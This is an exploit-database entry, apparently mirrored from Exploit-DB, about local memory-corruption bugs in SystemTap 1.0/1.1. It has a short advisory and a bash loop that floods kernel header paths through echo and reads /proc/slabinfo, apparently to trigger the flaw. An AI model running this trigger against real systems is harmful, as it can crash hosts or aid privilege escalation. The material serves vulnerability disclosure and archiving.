SystemTap 1.0/1.1 – ‘__get_argv()’ / ‘__get_compat_argv()’ Local Memory Corruption

  • 作者: Josh Stone
    日期: 2010-02-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33604/
  • source: https://www.securityfocus.com/bid/38120/info
    
    SystemTap is prone to multiple local memory-corruption vulnerabilities.
    
    An attacker may exploit these issues to execute arbitrary code with SYSTEM privileges. Failed exploit attempts will result in a denial of service.
    
    SystemTap 1.1 is vulnerable; other versions may also be affected. 
    
    #!/bin/bash
    while [ "0" = "0" ] ; do
    HOME=1
    /bin/echo /usr/src/kernels/2.6.18-128.el5-PAE-i686/include/*/*
    
    cat /proc/slabinfo
    done